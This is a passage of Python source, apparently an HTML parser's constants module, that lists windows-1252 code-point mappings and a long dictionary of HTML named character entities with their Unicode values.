"select": frozenset(("disabled", "readonly", "autofocus", "multiple")),
"output": frozenset(("disabled", "readonly")),
}
# entitiesWindows1252 has to be _ordered_ and needs to have an index. It
# therefore can't be a frozenset.
entitiesWindows1252 = (
8364, # 0x80 0x20AC EURO SIGN
65533, # 0x81 UNDEFINED
8218, # 0x82 0x201A SINGLE LOW-9 QUOTATION MARK
402, # 0x83 0x0192 LATIN SMALL LETTER F WITH HOOK
8222, # 0x84 0x201E DOUBLE LOW-9 QUOTATION MARK
8230, # 0x85 0x2026 HORIZONTAL ELLIPSIS
8224, # 0x86 0x2020 DAGGER
8225, # 0x87 0x2021 DOUBLE DAGGER
710, # 0x88 0x02C6 MODIFIER LETTER CIRCUMFLEX ACCENT
8240, # 0x89 0x2030 PER MILLE SIGN
352, # 0x8A 0x0160 LATIN CAPITAL LETTER S WITH CARON
8249, # 0x8B 0x2039 SINGLE LEFT-POINTING ANGLE QUOTATION MARK
338, # 0x8C 0x0152 LATIN CAPITAL LIGATURE OE
65533, # 0x8D UNDEFINED
381, # 0x8E 0x017D LATIN CAPITAL LETTER Z WITH CARON
65533, # 0x8F UNDEFINED
65533, # 0x90 UNDEFINED
8216, # 0x91 0x2018 LEFT SINGLE QUOTATION MARK
8217, # 0x92 0x2019 RIGHT SINGLE QUOTATION MARK
8220, # 0x93 0x201C LEFT DOUBLE QUOTATION MARK
8221, # 0x94 0x201D RIGHT DOUBLE QUOTATION MARK
8226, # 0x95 0x2022 BULLET
8211, # 0x96 0x2013 EN DASH
8212, # 0x97 0x2014 EM DASH
732, # 0x98 0x02DC SMALL TILDE
8482, # 0x99 0x2122 TRADE MARK SIGN
353, # 0x9A 0x0161 LATIN SMALL LETTER S WITH CARON
8250, # 0x9B 0x203A SINGLE RIGHT-POINTING ANGLE QUOTATION MARK
339, # 0x9C 0x0153 LATIN SMALL LIGATURE OE
65533, # 0x9D UNDEFINED
382, # 0x9E 0x017E LATIN SMALL LETTER Z WITH CARON
376 # 0x9F 0x0178 LATIN CAPITAL LETTER Y WITH DIAERESIS
)
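# Index lookup example: a numeric character reference in the windows-1252
# range, such as &#x93;, resolves via entitiesWindows1252[0x93 - 0x80],
# which is 8220 (LEFT DOUBLE QUOTATION MARK).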
xmlEntities = frozenset(('lt;', 'gt;', 'amp;', 'apos;', 'quot;'))
entities = {
"AElig": "\xc6",
"AElig;": "\xc6",
"AMP": "&",
"AMP;": "&",
"Aacute": "\xc1",
"Aacute;": "\xc1",
"Abreve;": "\u0102",
"Acirc": "\xc2",
"Acirc;": "\xc2",
"Acy;": "\u0410",
"Afr;": "\U0001d504",
"Agrave": "\xc0",
"Agrave;": "\xc0",
"Alpha;": "\u0391",
"Amacr;": "\u0100",
"And;": "\u2a53",
"Aogon;": "\u0104",
"Aopf;": "\U0001d538",
"ApplyFunction;": "\u2061",
"Aring": "\xc5",
"Aring;": "\xc5",
"Ascr;": "\U0001d49c",
"Assign;": "\u2254",
"Atilde": "\xc3",
"Atilde;": "\xc3",
"Auml": "\xc4",
"Auml;": "\xc4",
"Backslash;": "\u2216",
"Barv;": "\u2ae7",
"Barwed;": "\u2306",
"Bcy;": "\u0411",
"Because;": "\u2235",
"Bernoullis;": "\u212c",
"Beta;": "\u0392",
"Bfr;": "\U0001d505",
"Bopf;": "\U0001d539",
"Breve;": "\u02d8",
"Bscr;": "\u212c",
"Bumpeq;": "\u224e",
"CHcy;": "\u0427",
"COPY": "\xa9",
"COPY;": "\xa9",
"Cacute;": "\u0106",
"Cap;": "\u22d2",
"CapitalDifferentialD;": "\u2145",
"Cayleys;": "\u212d",
"Ccaron;": "\u010c",
"Ccedil": "\xc7",
"Ccedil;": "\xc7",
"Ccirc;": "\u0108",
"Cconint;": "\u2230",
"Cdot;": "\u010a",
"Cedilla;": "\xb8",
"CenterDot;": "\xb7",
"Cfr;": "\u212d",
"Chi;": "\u03a7",
"CircleDot;": "\u2299",
"CircleMinus;": "\u2296",
"CirclePlus;": "\u2295",
"CircleTimes;": "\u2297",
"ClockwiseContourIntegral;": "\u2232",
"CloseCurlyDoubleQuote;": "\u201d",
"CloseCurlyQuote;": "\u2019",
"Colon;": "\u2237",
"Colone;": "\u2a74",
"Congruent;": "\u2261",
"Conint;": "\u222f",
"ContourIntegral;": "\u222e",
"Copf;": "\u2102",
"Coproduct;": "\u2210",
"CounterClockwiseContourIntegral;": "\u2233",
"Cross;": "\u2a2f",
"Cscr;": "\U0001d49e",
"Cup;": "\u22d3",
"CupCap;": "\u224d",
"DD;": "\u2145",
"DDotrahd;": "\u2911",
"DJcy;": "\u0402",
"DScy;": "\u0405",
"DZcy;": "\u040f",
"Dagger;": "\u2021",
"Darr;": "\u21a1",
"Dashv;": "\u2ae4",
"Dcaron;": "\u010e",
"Dcy;": "\u0414",
"Del;": "\u2207",
"Delta;": "\u0394",
"Dfr;": "\U0001d507",
"DiacriticalAcute;": "\xb4",
"DiacriticalDot;": "\u02d9",
"DiacriticalDoubleAcute;": "\u02dd",
"DiacriticalGrave;": "`",
"DiacriticalTilde;": "\u02dc",
"Diamond;": "\u22c4",
"DifferentialD;": "\u2146",
"Dopf;": "\U0001d53b",
"Dot;": "\xa8",
"DotDot;": "\u20dc",
"DotEqual;": "\u2250",
"DoubleContourIntegral;": "\u222f",
"DoubleDot;": "\xa8",
"DoubleDownArrow;": "\u21d3",
"DoubleLeftArrow;": "\u21d0",
"DoubleLeftRightArrow;": "\u21d4",
"DoubleLeftTee;": "\u2ae4",
"DoubleLongLeftArrow;": "\u27f8",
"DoubleLongLeftRightArrow;": "\u27fa",
"DoubleLongRightArrow;": "\u27f9",
"DoubleRightArrow;": "\u21d2",
"DoubleRightTee;": "\u22a8",
"DoubleUpArrow;": "\u21d1",
"DoubleUpDownArrow;": "\u21d5",
"DoubleVerticalBar;": "\u2225",
"DownArrow;": "\u2193",
"DownArrowBar;": "\u2913",
"DownArrowUpArrow;": "\u21f5",
"DownBreve;": "\u0311",
"DownLeftRightVector;": "\u2950",
"DownLeftTeeVector;": "\u295e",
"DownLeftVector;": "\u21bd",
"DownLeftVectorBar;": "\u2956",
"DownRightTeeVector;": "\u295f",
"DownRightVector;": "\u21c1",
"DownRightVectorBar;": "\u2957",
"DownTee;": "\u22a4",
"DownTeeArrow;": "\u21a7",
"Downarrow;": "\u21d3",
"Dscr;": "\U0001d49f",
"Dstrok;": "\u0110",
"ENG;": "\u014a",
"ETH": "\xd0",
"ETH;": "\xd0",
"Eacute": "\xc9",
"Eacute;": "\xc9",
"Ecaron;": "\u011a",
"Ecirc": "\xca",
"Ecirc;": "\xca",
"Ecy;": "\u042d",
"Edot;": "\u0116",
"Efr;": "\U0001d508",
"Egrave": "\xc8",
"Egrave;": "\xc8",
"Element;": "\u2208",
"Emacr;": "\u0112",
"EmptySmallSquare;": "\u25fb",
"EmptyVerySmallSquare;": "\u25ab",
"Eogon;": "\u0118",
"Eopf;": "\U0001d53c",
"Epsilon;": "\u0395",
"Equal;": "\u2a75",
"EqualTilde;": "\u2242",
"Equilibrium;": "\u21cc",
"Escr;": "\u2130",
"Esim;": "\u2a73",
"Eta;": "\u0397",
"Euml": "\xcb",
"Euml;": "\xcb",
"Exists;": "\u2203",
"ExponentialE;": "\u2147",
"Fcy;": "\u0424",
"Ffr;": "\U0001d509",
"FilledSmallSquare;": "\u25fc",
"FilledVerySmallSquare;": "\u25aa",
"Fopf;": "\U0001d53d",
"ForAll;": "\u2200",
"Fouriertrf;": "\u2131",
"Fscr;": "\u2131",
"GJcy;": "\u0403",
"GT": ">",
"GT;": ">",
"Gamma;": "\u0393",
"Gammad;": "\u03dc",
"Gbreve;": "\u011e",
"Gcedil;": "\u0122",
"Gcirc;": "\u011c",
"Gcy;": "\u0413",
"Gdot;": "\u0120",
"Gfr;": "\U0001d50a",
"Gg;": "\u22d9",
"Gopf;": "\U0001d53e",
"GreaterEqual;": "\u2265",
"GreaterEqualLess;": "\u22db",
"GreaterFullEqual;": "\u2267",
"GreaterGreater;": "\u2aa2",
"GreaterLess;": "\u2277",
"GreaterSlantEqual;": "\u2a7e",
"GreaterTilde;": "\u2273",
"Gscr;": "\U0001d4a2",
"Gt;": "\u226b",
"HARDcy;": "\u042a",
"Hacek;": "\u02c7",
"Hat;": "^",
"Hcirc;": "\u0124",
"Hfr;": "\u210c",
"HilbertSpace;": "\u210b",
"Hopf;": "\u210d",
"HorizontalLine;": "\u2500",
"Hscr;": "\u210b",
"Hstrok;": "\u0126",
"HumpDownHump;": "\u224e",
"HumpEqual;": "\u224f",
"IEcy;": "\u0415",
"IJlig;": "\u0132",
"IOcy;": "\u0401",
"Iacute": "\xcd",
"Iacute;": "\xcd",
"Icirc": "\xce",
"Icirc;": "\xce",
"Icy;": "\u0418",
"Idot;": "\u0130",
"Ifr;": "\u2111",
"Igrave": "\xcc",
"Igrave;": "\xcc",
"Im;": "\u2111",
"Imacr;": "\u012a",
"ImaginaryI;": "\u2148",
"Implies;": "\u21d2",
"Int;": "\u222c",
"Integral;": "\u222b",
"Intersection;": "\u22c2",
"InvisibleComma;": "\u2063",
"InvisibleTimes;": "\u2062",
"Iogon;": "\u012e",
"Iopf;": "\U0001d540",
"Iota;": "\u0399",
"Iscr;": "\u2110",
"Itilde;": "\u0128",
"Iukcy;": "\u0406",
"Iuml": "\xcf",
"Iuml;": "\xcf",
"Jcirc;": "\u0134",
"Jcy;": "\u0419",
"Jfr;": "\U0001d50d",
"Jopf;": "\U0001d541",
"Jscr;": "\U0001d4a5",
"Jsercy;": "\u0408",
"Jukcy;": "\u0404",
"KHcy;": "\u0425",
"KJcy;": "\u040c",
"Kappa;": "\u039a",
"Kcedil;": "\u0136",
"Kcy;": "\u041a",
"Kfr;": "\U0001d50e",
"Kopf;": "\U0001d542",
"Kscr;": "\U0001d4a6",
"LJcy;": "\u0409",
"LT": "<",
"LT;": "<",
"Lacute;": "\u0139",
"Lambda;": "\u039b",
"Lang;": "\u27ea",
"Laplacetrf;": "\u2112",
"Larr;": "\u219e",
"Lcaron;": "\u013d",
"Lcedil;": "\u013b",
"Lcy;": "\u041b",
"LeftAngleBracket;": "\u27e8",
"LeftArrow;": "\u2190",
"LeftArrowBar;": "\u21e4",
"LeftArrowRightArrow;": "\u21c6",
"LeftCeiling;": "\u2308",
"LeftDoubleBracket;": "\u27e6",
"LeftDownTeeVector;": "\u2961",
"LeftDownVector;": "\u21c3",
"LeftDownVectorBar;": "\u2959",
"LeftFloor;": "\u230a",
"LeftRightArrow;": "\u2194",
"LeftRightVector;": "\u294e",
"LeftTee;": "\u22a3",
"LeftTeeArrow;": "\u21a4",
"LeftTeeVector;": "\u295a",
"LeftTriangle;": "\u22b2",
"LeftTriangleBar;": "\u29cf",
"LeftTriangleEqual;": "\u22b4",
"LeftUpDownVector;": "\u2951",
"LeftUpTeeVector;": "\u2960",
"LeftUpVector;": "\u21bf",
"LeftUpVectorBar;": "\u2958",
"LeftVector;": "\u21bc",
"LeftVectorBar;": "\u2952",
"Leftarrow;": "\u21d0",
"Leftrightarrow;": "\u21d4",
"LessEqualGreater;": "\u22da",
"LessFullEqual;": "\u2266",
"LessGreater;": "\u2276",
"LessLess;": "\u2aa1",
"LessSlantEqual;": "\u2a7d",
"LessTilde;": "\u2272",
"Lfr;": "\U0001d50f",
"Ll;": "\u22d8",
"Lleftarrow;": "\u21da",
"Lmidot;": "\u013f",
"LongLeftArrow;": "\u27f5",
"LongLeftRightArrow;": "\u27f7",
"LongRightArrow;": "\u27f6",
"Longleftarrow;": "\u27f8",
"Longleftrightarrow;": "\u27fa",
"Longrightarrow;": "\u27f9",
"Lopf;": "\U0001d543",
"LowerLeftArrow;": "\u2199",
"LowerRightArrow;": "\u2198",
"Lscr;": "\u2112",
"Lsh;": "\u21b0",
"Lstrok;": "\u0141",
"Lt;": "\u226a",
"Map;": "\u2905",
"Mcy;": "\u041c",
"MediumSpace;": "\u205f",
"Mellintrf;": "\u2133",
"Mfr;": "\U0001d510",
"MinusPlus;": "\u2213",
"Mopf;": "\U0001d544",
"Mscr;": "\u2133",
"Mu;": "\u039c",
"NJcy;": "\u040a",
"Nacute;": "\u0143",
"Ncaron;": "\u0147",
"Ncedil;": "\u0145",
"Ncy;": "\u041d",
"NegativeMediumSpace;": "\u200b",
"NegativeThickSpace;": "\u200b",
"NegativeThinSpace;": "\u200b",
"NegativeVeryThinSpace;": "\u200b",
"NestedGreaterGreater;": "\u226b",
"NestedLessLess;": "\u226a",
"NewLine;": "\n",
"Nfr;": "\U0001d511",
"NoBreak;": "\u2060",
"NonBreakingSpace;": "\xa0",
"Nopf;": "\u2115",
"Not;": "\u2aec",
"NotCongruent;": "\u2262",
"NotCupCap;": "\u226d",
"NotDoubleVerticalBar;": "\u2226",
"NotElement;": "\u2209",
"NotEqual;": "\u2260",
"NotEqualTilde;": "\u2242\u0338",
"NotExists;": "\u2204",
"NotGreater;": "\u226f",
"NotGreaterEqual;": "\u2271",
"NotGreaterFullEqual;": "\u2267\u0338",
"NotGreaterGreater;": "\u226b\u0338",
"NotGreaterLess;": "\u2279",
"NotGreaterSlantEqual;": "\u2a7e\u0338",
"NotGreaterTilde;": "\u2275",
"NotHumpDownHump;": "\u224e\u0338",
"NotHumpEqual;": "\u224f\u0338",
"NotLeftTriangle;": "\u22ea",
"NotLeftTriangleBar;": "\u29cf\u0338",
"NotLeftTriangleEqual;": "\u22ec",
"NotLess;": "\u226e",
"NotLessEqual;": "\u2270",
"NotLessGreater;": "\u2278",
"NotLessLess;": "\u226a\u0338",
"NotLessSlantEqual;": "\u2a7d\u0338",
"NotLessTilde;": "\u2274",
"NotNestedGreaterGreater;": "\u2aa2\u0338",
"NotNestedLessLess;": "\u2aa1\u0338",
"NotPrecedes;": "\u2280",
"NotPrecedesEqual;": "\u2aaf\u0338",
"NotPrecedesSlantEqual;": "\u22e0",
"NotReverseElement;": "\u220c",
"NotRightTriangle;": "\u22eb",
"NotRightTriangleBar;": "\u29d0\u0338",
"NotRightTriangleEqual;": "\u22ed",
"NotSquareSubset;": "\u228f\u0338",
"NotSquareSubsetEqual;": "\u22e2",
"NotSquareSuperset;": "\u2290\u0338",
"NotSquareSupersetEqual;": "\u22e3",
"NotSubset;": "\u2282\u20d2",
"NotSubsetEqual;": "\u2288",
"NotSucceeds;": "\u2281",
"NotSucceedsEqual;": "\u2ab0\u0338",
"NotSucceedsSlantEqual;": "\u22e1",
"NotSucceedsTilde;": "\u227f\u0338",
"NotSuperset;": "\u2283\u20d2",
"NotSupersetEqual;": "\u2289",
"NotTilde;": "\u2241",
"NotTildeEqual;": "\u2244",
"NotTildeFullEqual;": "\u2247",
"NotTildeTilde;": "\u2249",
"NotVerticalBar;": "\u2224",
"Nscr;": "\U0001d4a9",
"Ntilde": "\xd1",
"Ntilde;": "\xd1",
"Nu;": "\u039d",
"OElig;": "\u0152",
"Oacute": "\xd3",
"Oacute;": "\xd3",
"Ocirc": "\xd4",
"Ocirc;": "\xd4",
"Ocy;": "\u041e",
"Odblac;": "\u0150",
"Ofr;": "\U0001d512",
"Ograve": "\xd2",
"Ograve;": "\xd2",
"Omacr;": "\u014c",
"Omega;": "\u03a9",
"Omicron;": "\u039f",
"Oopf;": "\U0001d546",
"OpenCurlyDoubleQuote;": "\u201c",
"OpenCurlyQuote;": "\u2018",
"Or;": "\u2a54",
"Oscr;": "\U0001d4aa",
"Oslash": "\xd8",
"Oslash;": "\xd8",
"Otilde": "\xd5",
"Otilde;": "\xd5",
"Otimes;": "\u2a37",
"Ouml": "\xd6",
"Ouml;": "\xd6",
"OverBar;": "\u203e",
"OverBrace;": "\u23de",
"OverBracket;": "\u23b4",
"OverParenthesis;": "\u23dc",
"PartialD;": "\u2202",
"Pcy;": "\u041f",
"Pfr;": "\U0001d513",
"Phi;": "\u03a6",
"Pi;": "\u03a0",
"PlusMinus;": "\xb1",
"Poincareplane;": "\u210c",
"Popf;": "\u2119",
"Pr;": "\u2abb",
"Precedes;": "\u227a",
"PrecedesEqual;": "\u2aaf",
"PrecedesSlantEqual;": "\u227c",
"PrecedesTilde;": "\u227e",
"Prime;": "\u2033",
"Product;": "\u220f",
"Proportion;": "\u2237",
"Proportional;": "\u221d",
"Pscr;": "\U0001d4ab",
"Psi;": "\u03a8",
"QUOT": "\"",
"QUOT;": "\"",
"Qfr;": "\U0001d514",
"Qopf;": "\u211a",
"Qscr;": "\U0001d4ac",
"RBarr;": "\u2910",
"REG": "\xae",
"REG;": "\xae",
"Racute;": "\u0154",
"Rang;": "\u27eb",
"Rarr;": "\u21a0",
"Rarrtl;": "\u2916",
"Rcaron;": "\u0158",
"Rcedil;": "\u0156",
"Rcy;": "\u0420",
"Re;": "\u211c",
"ReverseElement;": "\u220b",
"ReverseEquilibrium;": "\u21cb",
"ReverseUpEquilibrium;": "\u296f",
"Rfr;": "\u211c",
"Rho;": "\u03a1",
"RightAngleBracket;": "\u27e9",
"RightArrow;": "\u2192",
"RightArrowBar;": "\u21e5",
"RightArrowLeftArrow;": "\u21c4",
"RightCeiling;": "\u2309",
"RightDoubleBracket;": "\u27e7",
"RightDownTeeVector;": "\u295d",
"RightDownVector;": "\u21c2",
"RightDownVectorBar;": "\u2955",
"RightFloor;": "\u230b",
"RightTee;": "\u22a2",
"RightTeeArrow;": "\u21a6",
"RightTeeVector;": "\u295b",
"RightTriangle;": "\u22b3",
"RightTriangleBar;": "\u29d0",
"RightTriangleEqual;": "\u22b5",
"RightUpDownVector;": "\u294f",
"RightUpTeeVector;": "\u295c",
"RightUpVector;": "\u21be",
"RightUpVectorBar;": "\u2954",
"RightVector;": "\u21c0",
"RightVectorBar;": "\u2953",
"Rightarrow;": "\u21d2",
"Ropf;": "\u211d",
"RoundImplies;": "\u2970",
"Rrightarrow;": "\u21db",
"Rscr;": "\u211b",
"Rsh;": "\u21b1",
"RuleDelayed;": "\u29f4",
"SHCHcy;": "\u0429",
"SHcy;": "\u0428",
"SOFTcy;": "\u042c",
"Sacute;": "\u015a",
"Sc;": "\u2abc",
"Scaron;": "\u0160",
"Scedil;": "\u015e",
"Scirc;": "\u015c",
"Scy;": "\u0421",
"Sfr;": "\U0001d516",
"ShortDownArrow;": "\u2193",
"ShortLeftArrow;": "\u2190",
"ShortRightArrow;": "\u2192",
"ShortUpArrow;": "\u2191",
"Sigma;": "\u03a3",
"SmallCircle;": "\u2218",
"Sopf;": "\U0001d54a",
"Sqrt;": "\u221a",
"Square;": "\u25a1",
"SquareIntersection;": "\u2293",
"SquareSubset;": "\u228f",
"SquareSubsetEqual;": "\u2291",
"SquareSuperset;": "\u2290",
"SquareSupersetEqual;": "\u2292",
"SquareUnion;": "\u2294",
"Sscr;": "\U0001d4ae",
"Star;": "\u22c6",
"Sub;": "\u22d0",
"Subset;": "\u22d0",
"SubsetEqual;": "\u2286",
"Succeeds;": "\u227b",
"SucceedsEqual;": "\u2ab0",
"SucceedsSlantEqual;": "\u227d",
"SucceedsTilde;": "\u227f",
"SuchThat;": "\u220b",
"Sum;": "\u2211",
"Sup;": "\u22d1",
"Superset;": "\u2283",
"SupersetEqual;": "\u2287",
"Supset;": "\u22d1",
"THORN": "\xde",
"THORN;": "\xde",
"TRADE;": "\u2122",
"TSHcy;": "\u040b",
"TScy;": "\u0426",
"Tab;": "\t",
"Tau;": "\u03a4",
"Tcaron;": "\u0164",
"Tcedil;": "\u0162",
"Tcy;": "\u0422",
"Tfr;": "\U0001d517",
"Therefore;": "\u2234",
"Theta;": "\u0398",
"ThickSpace;": "\u205f\u200a",
"ThinSpace;": "\u2009",
"Tilde;": "\u223c",
"TildeEqual;": "\u2243",
"TildeFullEqual;": "\u2245",
"TildeTilde;": "\u2248",
"Topf;": "\U0001d54b",
"TripleDot;": "\u20db",
"Tscr;": "\U0001d4af",
"Tstrok;": "\u0166",
"Uacute": "\xda",
"Uacute;": "\xda",
"Uarr;": "\u219f",
"Uarrocir;": "\u2949",
"Ubrcy;": "\u040e",
"Ubreve;": "\u016c",
"Ucirc": "\xdb",
"Ucirc;": "\xdb",
"Ucy;": "\u0423",
"Udblac;": "\u0170",
"Ufr;": "\U0001d518",
"Ugrave": "\xd9",
"Ugrave;": "\xd9",
"Umacr;": "\u016a",
"UnderBar;": "_",
"UnderBrace;": "\u23df",
"UnderBracket;": "\u23b5",
"UnderParenthesis;": "\u23dd",
"Union;": "\u22c3",
"UnionPlus;": "\u228e",
"Uogon;": "\u0172",
"Uopf;": "\U0001d54c",
"UpArrow;": "\u2191",
"UpArrowBar;": "\u2912",
"UpArrowDownArrow;": "\u21c5",
"UpDownArrow;": "\u2195",
"UpEquilibrium;": "\u296e",
"UpTee;": "\u22a5",
"UpTeeArrow;": "\u21a5",
"Uparrow;": "\u21d1",
"Updownarrow;": "\u21d5",
"UpperLeftArrow;": "\u2196",
"UpperRightArrow;": "\u2197",
"Upsi;": "\u03d2",
"Upsilon;": "\u03a5",
"Uring;": "\u016e",
"Uscr;": "\U0001d4b0",
"Utilde;": "\u0168",
"Uuml": "\xdc",
"Uuml;": "\xdc",
"VDash;": "\u22ab",
"Vbar;": "\u2aeb",
"Vcy;": "\u0412",
"Vdash;": "\u22a9",
"Vdashl;": "\u2ae6",
"Vee;": "\u22c1",
"Verbar;": "\u2016",
"Vert;": "\u2016",
"VerticalBar;": "\u2223",
"VerticalLine;": "|",
"VerticalSeparator;": "\u2758",
"VerticalTilde;": "\u2240",
"VeryThinSpace;": "\u200a",
"Vfr;": "\U0001d519",
"Vopf;": "\U0001d54d",
"Vscr;": "\U0001d4b1",
"Vvdash;": "\u22aa",
"Wcirc;": "\u0174",
"Wedge;": "\u22c0",
"Wfr;": "\U0001d51a",
"Wopf;": "\U0001d54e",
"Wscr;": "\U0001d4b2",
"Xfr;": "\U0001d51b",
"Xi;": "\u039e",
"Xopf;": "\U0001d54f",
"Xscr;": "\U0001d4b3",
"YAcy;": "\u042f",
"YIcy;": "\u0407",
"YUcy;": "\u042e",
"Yacute": "\xdd",
"Yacute;": "\xdd",
"Ycirc;": "\u0176",
"Ycy;": "\u042b",
"Yfr;": "\U0001d51c",
"Yopf;": "\U0001d550",
"Yscr;": "\U0001d4b4",
"Yuml;": "\u0178",
"ZHcy;": "\u0416",
"Zacute;": "\u0179",
"Zcaron;": "\u017d",
"Zcy;": "\u0417",
"Zdot;": "\u017b",
"ZeroWidthSpace;": "\u200b",
"Zeta;": "\u0396",
"Zfr;": "\u2128",
"Zopf;": "\u2124",
"Zscr;": "\U0001d4b5",
"aacute": "\xe1",
"aacute;": "\xe1",
"abreve;": "\u0103",
"ac;": "\u223e",
"acE;": "\u223e\u0333",
"acd;": "\u223f",
"acirc": "\xe2",
"acirc;": "\xe2",
"acute": "\xb4",
"acute;": "\xb4",
"acy;": "\u0430",
"aelig": "\xe6",
"aelig;": "\xe6",
"af;": "\u2061",
"afr;": "\U0001d51e",
"agrave": "\xe0",
"agrave;": "\xe0",
"alefsym;": "\u2135",
"aleph;": "\u2135",
"alpha;": "\u03b1",
"amacr;": "\u0101",
"amalg;": "\u2a3f",
"amp": "&",
"amp;": "&",
"and;": "\u2227",
"andand;": "\u2a55",
"andd;": "\u2a5c",
"andslope;": "\u2a58",
"andv;": "\u2a5a",
"ang;": "\u2220",
"ange;": "\u29a4",
"angle;": "\u2220",
"angmsd;": "\u2221",
"angmsdaa;": "\u29a8",
"angmsdab;": "\u29a9",
"angmsdac;": "\u29aa",
"angmsdad;": "\u29ab",
"angmsdae;": "\u29ac",
"angmsdaf;": "\u29ad",
"angmsdag;": "\u29ae",
"angmsdah;": "\u29af",
"angrt;": "\u221f",
"angrtvb;": "\u22be",
"angrtvbd;": "\u299d",
"angsph;": "\u2222",
"angst;": "\xc5",
"angzarr;": "\u237c",
"aogon;": "\u0105",
"aopf;": "\U0001d552",
"ap;": "\u2248",
"apE;": "\u2a70",
"apacir;": "\u2a6f",
"ape;": "\u224a",
"apid;": "\u224b",
"apos;": "'",
"approx;": "\u2248",
"approxeq;": "\u224a",
"aring": "\xe5",
"aring;": "\xe5",
"ascr;": "\U0001d4b6",
"ast;": "*",
"asymp;": "\u2248",
"asympeq;": "\u224d",
"atilde": "\xe3",
"atilde;": "\xe3",
"auml": "\xe4",
"auml;": "\xe4",
"awconint;": "\u2233",
"awint;": "\u2a11",
"bNot;": "\u2aed",
"backcong;": "\u224c",
"backepsilon;": "\u03f6",
"backprime;": "\u2035",
"backsim;": "\u223d",
"backsimeq;": "\u22cd",
"barvee;": "\u22bd",
"barwed;": "\u2305",
"barwedge;": "\u2305",
"bbrk;": "\u23b5",
"bbrktbrk;": "\u23b6",
"bcong;": "\u224c",
"bcy;": "\u0431",
"bdquo;": "\u201e",
"becaus;": "\u2235",
"because;": "\u2235",
"bemptyv;": "\u29b0",
"bepsi;": "\u03f6",
"bernou;": "\u212c",
"beta;": "\u03b2",
"beth;": "\u2136",
"between;": "\u226c",
"bfr;": "\U0001d51f",
"bigcap;": "\u22c2",
"bigcirc;": "\u25ef",
"bigcup;": "\u22c3",
"bigodot;": "\u2a00",
"bigoplus;": "\u2a01",
"bigotimes;": "\u2a02",
"bigsqcup;": "\u2a06",
"bigstar;": "\u2605",
"bigtriangledown;": "\u25bd",
"bigtriangleup;": "\u25b3",
"biguplus;": "\u2a04",
"bigvee;": "\u22c1",
"bigwedge;": "\u22c0",
"bkarow;": "\u290d",
"blacklozenge;": "\u29eb",
"blacksquare;": "\u25aa",
"blacktriangle;": "\u25b4",
"blacktriangledown;": "\u25be",
"blacktriangleleft;": "\u25c2",
"blacktriangleright;": "\u25b8",
"blank;": "\u2423",
"blk12;": "\u2592",
"blk14;": "\u2591",
"blk34;": "\u2593",
"block;": "\u2588",
"bne;": "=\u20e5",
"bnequiv;": "\u2261\u20e5",
"bnot;": "\u2310",
"bopf;": "\U0001d553",
"bot;": "\u22a5",
"bottom;": "\u22a5",
"bowtie;": "\u22c8",
"boxDL;": "\u2557",
"boxDR;": "\u2554",
"boxDl;": "\u2556",
"boxDr;": "\u2553",
"boxH;": "\u2550",
"boxHD;": "\u2566",
"boxHU;": "\u2569",
"boxHd;": "\u2564",
"boxHu;": "\u2567",
"boxUL;": "\u255d",
"boxUR;": "\u255a",
"boxUl;": "\u255c",
"boxUr;": "\u2559",
"boxV;": "\u2551",
"boxVH;": "\u256c",
"boxVL;": "\u2563",
"boxVR;": "\u2560",
"boxVh;": "\u256b",
"boxVl;": "\u2562",
"boxVr;": "\u255f",
"boxbox;": "\u29c9",
"boxdL;": "\u2555",
"boxdR;": "\u2552",
"boxdl;": "\u2510",
"boxdr;": "\u250c",
"boxh;": "\u2500",
"boxhD;": "\u2565",
"boxhU;": "\u2568",
"boxhd;": "\u252c",
"boxhu;": "\u2534",
"boxminus;": "\u229f",
"boxplus;": "\u229e",
"boxtimes;": "\u22a0",
"boxuL;": "\u255b",
"boxuR;": "\u2558",
"boxul;": "\u2518",
"boxur;": "\u2514",
"boxv;": "\u2502",
"boxvH;": "\u256a",
"boxvL;": "\u2561",
"boxvR;": "\u255e",
"boxvh;": "\u253c",
"boxvl;": "\u2524",
"boxvr;": "\u251c",
"bprime;": "\u2035",
"breve;": "\u02d8",
"brvbar": "\xa6",
"brvbar;": "\xa6",
"bscr;": "\U0001d4b7",
"bsemi;": "\u204f",
"bsim;": "\u223d",
"bsime;": "\u22cd",
"bsol;": "\\",
"bsolb;": "\u29c5",
"bsolhsub;": "\u27c8",
"bull;": "\u2022",
"bullet;": "\u2022",
"bump;": "\u224e",
"bumpE;": "\u2aae",
"bumpe;": "\u224f",
"bumpeq;": "\u224f",
"cacute;": "\u0107",
"cap;": "\u2229",
"capand;": "\u2a44",
"capbrcup;": "\u2a49",
"capcap;": "\u2a4b",
"capcup;": "\u2a47",
"capdot;": "\u2a40",
"caps;": "\u2229\ufe00",
"caret;": "\u2041",
"caron;": "\u02c7",
"ccaps;": "\u2a4d",
"ccaron;": "\u010d",
"ccedil": "\xe7",
"ccedil;": "\xe7",
"ccirc;": "\u0109",
"ccups;": "\u2a4c",
"ccupssm;": "\u2a50",
"cdot;": "\u010b",
"cedil": "\xb8",
"cedil;": "\xb8",
"cemptyv;": "\u29b2",
"cent": "\xa2",
"cent;": "\xa2",
"centerdot;": "\xb7",
"cfr;": "\U0001d520",
"chcy;": "\u0447",
"check;": "\u2713",
"checkmark;": "\u2713",
"chi;": "\u03c7",
"cir;": "\u25cb",
"cirE;": "\u29c3",
"circ;": "\u02c6",
"circeq;": "\u2257",
"circlearrowleft;": "\u21ba",
"circlearrowright;": "\u21bb",
"circledR;": "\xae",
"circledS;": "\u24c8",
"circledast;": "\u229b",
"circledcirc;": "\u229a",
"circleddash;": "\u229d",
"cire;": "\u2257",
"cirfnint;": "\u2a10",
"cirmid;": "\u2aef",
"cirscir;": "\u29c2",
"clubs;": "\u2663",
"clubsuit;": "\u2663",
"colon;": ":",
"colone;": "\u2254",
"coloneq;": "\u2254",
"comma;": ",",
"commat;": "@",
"comp;": "\u2201",
"compfn;": "\u2218",
"complement;": "\u2201",
"complexes;": "\u2102",
"cong;": "\u2245",
"congdot;": "\u2a6d",
"conint;": "\u222e",
"copf;": "\U0001d554",
"coprod;": "\u2210",
"copy": "\xa9",
"copy;": "\xa9",
"copysr;": "\u2117",
"crarr;": "\u21b5",
"cross;": "\u2717",
"cscr;": "\U0001d4b8",
"csub;": "\u2acf",
"csube;": "\u2ad1",
"csup;": "\u2ad0",
"csupe;": "\u2ad2",
"ctdot;": "\u22ef",
"cudarrl;": "\u2938",
"cudarrr;": "\u2935",
"cuepr;": "\u22de",
"cuesc;": "\u22df",
"cularr;": "\u21b6",
"cularrp;": "\u293d",
"cup;": "\u222a",
"cupbrcap;": "\u2a48",
"cupcap;": "\u2a46",
"cupcup;": "\u2a4a",
